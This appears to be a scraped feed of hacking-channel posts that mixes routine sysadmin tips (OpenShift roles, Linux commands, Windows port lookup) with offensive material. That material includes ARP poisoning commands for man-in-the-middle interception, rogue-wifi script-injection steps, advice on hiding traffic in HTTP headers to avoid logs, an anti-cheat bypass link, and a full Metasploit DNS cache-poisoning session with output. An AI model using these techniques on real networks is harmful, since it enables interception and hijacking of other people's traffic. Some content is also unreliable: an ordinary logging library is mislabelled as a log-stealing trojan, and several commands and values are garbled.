▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Why transfer data in HTTP headers :

1) Usually, predictable technical information is conveyed in HTTP headers, so not all programs for logging and traffic analysis have the function of saving the contents of HTTP headers. For example, Apache usually (it depends on the setting of the log format) stores such HTTP header fields as Referer and User-Agent . If you want, you can configure Apache to save the data submitted by the POST method, but this is usually not done, since the logs begin to take up too much space.

2) As for storing other HTTP header fields, this is in principle possible, but this requires enabling and configuring the mod_log_forensic module , this also happens infrequently, plus storing a large amount of practically unnecessary data.

3) Therefore, there are certain reasons to use HTTP headers for data transfer, since GET requests are saved almost always, POST requests are rarely saved, and HTTP headers are almost never saved.

4) Among the popular applications that use the HTTP header field to transfer data, you can at first recall PhpSploit - "a hidden framework for subsequent exploitation", in short, a Trojan, a PHP backdoor for web servers.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑good for bypass steam ban
—-Valve Anti-Cheat bypass tested—


https://github.com/danielkrupinski/VAC-Bypass

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST NETWORK HACKING :

ARP Poisoning and Sniffing
DHCP Discover and Starvation
Subdomains Identification
Certificate Cloning
TCP Analysis (ISN, Flags)
Username check on social networks
Web Techonologies Identification
and a lot more!

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/fportantier/habu.git

2) cd habu

3) habu.arp.ping [OPTIONS] IP

A) Send ARP packets to check if a host it's alive in the local network.

Example:

# habu.arp.ping 192.168.0.1
Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding

Options:
-i TEXT Interface to use
-v Verbose output
--help Show this message and exit.
habu.arp.poison
Usage: habu.arp.poison [OPTIONS] VICTIM1 VICTIM2

B) Send ARP 'is-at' packets to each victim, poisoning their ARP tables for
send the traffic to your system.

Note: If you want a full working Man In The Middle attack, you need to
enable the packet forwarding on your operating system to act like a
router. You can do that using:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Example:

# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...

Options:
-i TEXT Interface to use
-v Verbose
--help Show this message and exit.
habu.arp.sniff
Usage: habu.arp.sniff [OPTIONS]

C) Listen for ARP packets and show information for each device.

Columns: Seconds from last packet | IP | MAC | Vendor

Example:

1 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom Broadband SAS
7 192.168.0.2 64:bc:0c:33:e5:57 LG Electronics (Mobile Communications)
2 192.168.0.5 00:c2:c6:30:2c:58 Intel Corporate
6 192.168.0.7 54:f2:01:db:35:58 Samsung Electronics Co.,Ltd

Options:
-i TEXT Interface to use
--help Show this message and exit.
habu.asydns
Usage: habu.asydns [OPTIONS]

D) Requests a DNS domain name based on public and private RSA keys using the
AsyDNS protocol https://github.com/portantier/asydns

AND MUCH MORE

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Creating a project on OpenShift :

1) Create a project on OpenShift.

This can be done using the command line interface or the web console.

$ oc new-project test
Now using project "test" on server "https://api.devocp.example.com:6443".

2) Then you can list all available projects to make sure the one you just created is available.

$ oc get projects
Granting user access to an OpenShift project

3) You must have users who already have access to the OpenShift cluster before you can grant them permission to access the project.

There are several providers that can be used to authenticate users in OpenShift, such as HTPassw:

🦑OpenShift / OKD user management with HTPasswd indentity provider:

You can get a list of users who are already logged into the cluster with the oc get users command:

$ oc get users
JKMUTAI 17a06002-b543-4fa9-bfa8-92e510646d0a Josphat Mutai

4) Give the user access to the rolebinding project.
The syntax used is:

$ oc adm policy add-role-to-user <role> <user> -n <projectname>
To assign the edit role to user JKMUTAI in the test project (test), I will run the following commands.
$ oc adm policy add-role-to-user edit JKMUTAI -n test
clusterrole.rbac.authorization.k8s.io/edit added: "JKMUTAI"
For Cluster role use command:

$ oc adm policy add-cluster-role-to-user edit JKMUTAI -n test

5) To remove a user role use:

$ oc adm policy remove-role-from-user <role> <user> -n <projectname>
$ oc adm policy remove-cluster-role-from-user <role> <user> -n <projectname>

6) If you want to get a list of users who have access to the project, run the following command:

$ oc get rolebindings -n <projectname>
$ oc get rolebindings <rolename> -n <projectname>
You can log in from the CLI or Console and confirm that you can switch to the project to deploy applications.
$ oc login
Switch to the project with the command:

$ oc project test
Already on project "test" on server "https://api.example.com:6443".

7) Deploy the test application.

oc apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: command-demo
labels:
purpose: demonstrate-command
spec:
containers:
- name: command-demo-container
image: debian
command: ["printenv"]
args: ["HOSTNAME", "KUBERNETES_PORT"]
restartPolicy: OnFailure
EOF

8) Confirm that the container is running:

$ oc get pods

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SpeeduP Linux Tips:

> Reduce the default grub load time:

>Manage startup applications:

>Install preload to speed up application load time:

>Choose the best mirror for software updates:

>Use apt-fast instead of apt-get for a speedy update:

>Remove language related ign from apt-get update:

>Reduce overheating by disabling system services

#FastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DOM-based or local XSS

Based on DOM or local XSS attacks. Generally, a free wifi is provided, but a gateway that provides free wifi will insert a script into any page you visit or directly return a phishing page, thereby implanting malicious scripts. This kind of direct existence on the page without returning from the server is a local XSS attack.

Example 1:

1. Provide a free wifi.

1. Start a special DNS service, resolve all domain names to our computer, and set the Wifi DHCP-DNS to our computer IP.

2. After the user connected to wifi opens any website, the request will be intercepted by us. We forward to the real server according to the host field in the http header.

3. After receiving the data returned by the server, we can inject the webpage script and return it to the user.

4. When the injected script is executed, the user's browser will preload the common script libraries of major websites in turn.
#FastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🔍 What process is listening on a port on Windows?

1) Using the command line
Use the following command to find out the process id (pid) listening on port 433 .

You can change this value to look for a different port.

netstat -aon | findstr ": 443" | findstr "LISTENING"
Conclusion:

TCP 0.0.0.0:443 0.0.0.0 0 LISTENING 2180
TCP 127.0.0.1:44312 0.0.0.0 0 LISTENING 4620
TCP [::]: 443 [::]: 0 LISTENING 2180


The last column of the output displays the process ID.

The output shows the pid is 2189 and 4620 for processes listening on port 443.

Use this process ID with the task list command to find the process name.

tasklist / fi "pid eq 2190"


2) Using PowerShell Get-Process
The second method uses a PowerShell command to identify the process running on a specific port on Windows.

Start a PowerShell terminal and run the following command to find the name of the process running on port 443.

You can change the port number to check for other ports.

Get-Process -Id (Get-NetTCPConnection -LocalPort 443) .OwningProcess

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

New Vulnerability in Apache could allow attackers to exploit logins.
#Vulnerabilities

New Vulnerability in Ubuntu could allow attackers to gain root access.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Basic Linux commands:

pwd. List the current (working) directory. [user @ testhost ~] $ pwd / home / user.

date. Display the current date and time of the system.

w. This command shows who is logged in to the system.

ls. Print directory contents.

cd. Change the current directory.

mkdir. Create directory.

rm. Delete a file.

cp. Copy file or directory.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑100% working way to remove protection from Excel document with and without password :


https://www.linkconnector.com/ta.php?lc=155151095842006248&lcpt=1&lcpf=0

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Night Shift on Unsupported Macs ?

MacBookPro9,x
iMacPro1,x
iMac13,x
Macmini6,x
MacBookAir5,x
MacPro6,x
MacBook8,x

🄻🄴🅃'🅂 🅂🅃🄰🅁🅃 :

1) Open the Installer in the Root of the Repository
https://github.com/TMRJIJ/Night-Shift-on-Unsupported-Macs

2) Follow the steps and agree to the terms

3) Accept & Install

4) Upon Completion, Restart your Mac

5) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.

6) Open the Terminal app in your Applications Folder

7) Drag the 'Enable NightShift.sh' into the Terminal Window
Following the instructions

8) After Patching. Restart your Mac.

9) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑best wireless debugging for android devices :

https://dl.google.com/android/repository/platform-tools-latest-windows.zip (debug via windows)

Apple’s official website enters maintenance status: iPhone 12mini opens pre-order tonight.
#international

Through NVIDIA Cloud Games, iOS users will be able to replay “Fortress Night”
#international #Updates

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME HACKER TOOLS:

- CrawlBox - Easy way to brute-force web directory..

- TrackOut - Simple Python IP Tracker.

- sslcaudit - No description provided

- Sublist3r - Fast subdomains enumeration tool for penetration testers.

- doork - Passive Vulnerability Auditor.

- sir - Skype Ip Resolver.

- xl-py - No description provided

- netdiscover - netdiscover.

- ATSCAN - Advanced dork Search & Mass Exploit Scanner.![->]

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A TROJAN FOR STEAL LOGS:

F E A T U R E S :
Concise API, it is easy to achieve diary record function through a few lines of code;

Use the AOP technologies Lancet SDK, it is comfortable to collect common logs, also support incremental compile;

Use mmap technology to ensure the efficiency of log records;
Scalability, developers can customize the log file to achieve the purpose of the upload;

Small traffic overhead, remote control user log file upload or not by online configuration;

High stability, it is very stable at many apps.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

DOWNLOAD https://github.com/eleme/Trojan

Add in the root directory's build.gradle:

buildscript {
dependencies {
......
classpath 'me.ele:lancet-plugin:1.0.2'
}
}
Add in the app directory's build.gradle:

apply plugin: 'me.ele.lancet'

dependencies {
......
provided 'me.ele:lancet-base:1.0.2'
compile 'me.ele:trojan-library:0.0.5'
}
Use

1) Initialization
Add in the custom Application:

TrojanConfig config = new TrojanConfig.Builder(this)
// Set user information
.userInfo("xxxx")
// Set device id
.deviceId("xxxx")
// Set cipher key if need encry log
.cipherKey("xxxx")
// Optional, save log file in sdcard by default
.logDir("xxxx")
// Console log switch, the default is open
.enableLog(true)
.build();
Trojan.init(config);
🦑Special Note:

The log files are stored in sdcard by default and will not be lost even if the application is uninstalled;
To be compatible with multiple processes, log files stored in their respective directories;
The log is not encrypted by default, we currently only provide TEA encryption in view for high efficiency。

2) Record the log
Trojan provides two ways to recode log:

Firstly:

Trojan.log("Trojan", "We have a nice day!");
Secondly:

List<String> msgList = new LinkedList <>();
msgList.add("Hello Trojan!");
msgList.add("We have a nice day!");
msgList.add("Hello world!");
Trojan.log("Trojan", msgList);
By default, a single line log is not encrypted, and if you need to encrypt it, the following is used:

Trojan.log("Trojan", "We have a nice day!", true);
3) User Information
When the user information changes or switch users, you can call:

Trojan.refreshUser("new user info");
Of course, if the user logs out, you can pass a null value:

Trojan.refreshUser(null);
4) Upload Solution
In Demo we provided free and simple way such as LeanCloud to upload log file, you can browse, download and download log file.

5) Data Decryption
When we set the encryption key, we can encrypt a single log to ensure the security of sensitive data. We must decrypt the encrypted data When we analyze the log. Use the decryption script as follows:

Compile and generate decryption SO library on MAC, The so library has been generated in the repository. This step can be omitted:

gcc -shared -Wl,-install_name,trojan_decrypt.so -o trojan_decrypt.so -fPIC trojan_decrypt.c
Call python script to decrypt the data on MAC, you need to pass in the decryption key and file path to be decrypted, it should be noted that the path of the python script:

python ./trojan_decrypt.py cipher-key cipher-file-path
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Kaminsky DNS Cache Poisoning Flaw Exploit for Domains:

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
dns01.metasploit.com.

Use for Learn !!
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁